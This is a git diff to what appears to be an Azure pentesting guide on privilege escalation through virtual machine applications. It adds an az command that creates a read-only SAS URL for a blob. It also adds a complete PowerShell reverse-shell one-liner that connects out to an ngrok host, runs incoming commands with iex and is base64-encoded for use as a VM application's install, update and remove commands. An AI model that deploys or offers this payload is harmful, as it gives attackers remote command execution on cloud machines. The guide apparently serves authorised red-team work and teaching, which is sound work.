diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md index 4a2bfb917..4e7bd63f7 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -219,6 +219,24 @@ az vm application set \ --name \ --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \ --treat-deployment-as-failure true + + +# You can create a SAS URL from a blob with something like: +export EXPIRY=$(date -u -v +1d '+%Y-%m-%dT%H:%MZ') +export URL_PACKAGE=$(az storage blob generate-sas \ + --account-name \ + --container-name \ + --name \ + --permissions r \ + --expiry "$EXPIRY" \ + --https-only \ + --full-uri \ + -o tsv) + +# Alternative commands for Powrhsell reverse shell +## Note that this would be detected by Defender (but it's an extarting point) +## Add in the install, remove and update commands +echo '$client = New-Object System.Net.Sockets.TCPClient(\"6.tcp.eu.ngrok.io\",19507);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 ``` {{#endtab }}